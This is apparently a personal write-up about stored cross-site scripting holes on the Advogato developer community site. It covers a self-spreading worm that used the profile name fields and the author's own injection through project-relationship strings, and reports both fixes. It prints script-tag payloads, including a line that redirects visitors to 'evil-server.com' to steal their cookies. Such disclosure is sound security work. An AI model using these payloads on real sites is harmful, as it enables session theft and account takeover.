Advogato is a community website which serves as a resource for free software developers.
It provides several useful services for developers, including the ability to post diary entries, and a simple project directory.
One of its intended purposes is to serve as a test-bed for trust metrics, with the idea that you can rate other members contributions towards open source software. This kind of system is very interesting for a great number of reasons, and is documented nicely online.
(The site is open to anybody to join, although the peer rating system is focussed upon rating users contribution to free software).
Recently there was a malicious piece of code which demonstrated a weakness in the sites filtering of user supplied data.
Whenever a logged in user would visit an infected profile page their own profile would be updated to include a copy of the malicious code - causing it to spread.
The source of the infection' was improper filtering of the users forename and surname fields within the profile pages. When an account on Advogato was created several fields would be filled in by the user, things such as Forename, Surname, and location. These details would then be displayed upon the users personal page.
Unfortunately these fields weren't checked for malicious content and sanitized, instead they were displayed as entered.
The lack of filtering meant that it was possible to do something sneaky such as setting your surname to be:
<script>alert('foo');</script>This would cause any visitor who viewed the page to see a Javascript popup.
With a little bit of creativity the creator of the virus, was able to modify the personal page of any Advogato user who visited their page whilst they were logged in - this was accomplished by embedding code within their surname field to modify the logged in visitors own surname entry, hence propogating the viral code.
Shortly after being discovered this hole was plugged, and script and malicious content was filtered out of peoples Forname: and Surname: fields.
(Frustratingly I can't remember the username of the creator of this code. I know it was documented on the recent diary entries page, but unfortunately I didn't save a link to it; any pointers would be greatfully accepted).
Due to its nature of being an open source advocacy site the site allows you to create project pages, and definate your relationship to existing projects.
For example I created a project page for my open source MP3/Ogg vorbis streaming server - then set my personal page to include my relationship to that project.
My relationship to that project is 'Lead Developer' - which is one of the standard tags such as 'Lead Developer', 'Developer', 'Contributor', 'Helper', etc.
I noticed fairly quickly that due to the relationship strings not being checked at the server side which meant that you could set your relationship to be anything you wanted to be, not limiting yourself to the predefined strings.
I made this public in my diary on the 31st of August 2002, and did see a few people play along. For example several people now have interesting relationships to The Universe project.
(In all fairness I'm sure that this was common knowledge before I "discovered" it and wrote about it).
As an experiment I set my interest in a project to be the following string:
Contributor.<script>alert('foo');</script>As expected this was filtered when the project page was displayed, but not upon my personal page....
This proved that I could inject malicious javascript into my profile page, which could silently execute whenever a logged in Advogato user would visit it.
I didn't actually go very far down this road, so I don't know if there were any practical limitations such as size limits which would have curtailed the exploit.
A simple means of exploiting this would have been to contain code like this :
<script> document.location= 'http://www.evil-server.com/cgi-bin/steal.cgi?document.cookie' </script>This would redirect the user to a page upon an external server - allowing the cookie to be stolen, the account page to be modified with that cookie, and finally the user to be redirected back to the original page.
Fix this hole appears to be fairly straighforward from Raph's response to the previous hole. It just involves wrapping the display of the interests prior to display with a call to 'pretty_html'.
I've just received a mail .. the hole is closed. I'll not do anything like that again to the fine Advogato site.